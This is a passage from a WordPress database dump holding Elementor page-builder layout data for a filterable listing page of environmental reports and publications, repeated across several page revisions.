settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"1f55107\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"align\":\"left\",\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30012,3834,'_elementor_controls_usage','a:5:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:4:\"view\";i:1;s:9:\"icon_list\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:3:{s:13:\"space_between\";i:1;s:10:\"icon_align\";i:1;s:13:\"divider_color\";i:1;}s:18:\"section_text_style\";a:3:{s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"align\";i:1;s:7:\"link_to\";i:1;s:5:\"image\";i:1;s:4:\"link\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(30014,4194,'_elementor_edit_mode','builder'),(30015,4194,'_elementor_template_type','wp-page'),(30016,4194,'_elementor_version','3.4.1'),(30017,4194,'_wp_page_template','default'),(30018,4194,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30020,4194,'_elementor_pro_version','3.3.6'),(30022,4195,'_elementor_edit_mode','builder'),(30023,4195,'_elementor_template_type','wp-page'),(30024,4195,'_elementor_version','3.4.1'),(30025,4195,'_wp_page_template','default'),(30026,4195,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30028,4195,'_elementor_pro_version','3.3.6'),(30030,4196,'_elementor_edit_mode','builder'),(30031,4196,'_elementor_template_type','wp-page'),(30032,4196,'_elementor_version','3.4.1'),(30033,4196,'_wp_page_template','default'),(30034,4196,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30036,4196,'_elementor_pro_version','3.3.6'),(30043,4197,'_elementor_edit_mode','builder'),(30044,4197,'_elementor_template_type','wp-page'),(30045,4197,'_elementor_version','3.4.1'),(30046,4197,'_wp_page_template','default'),(30047,4197,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" 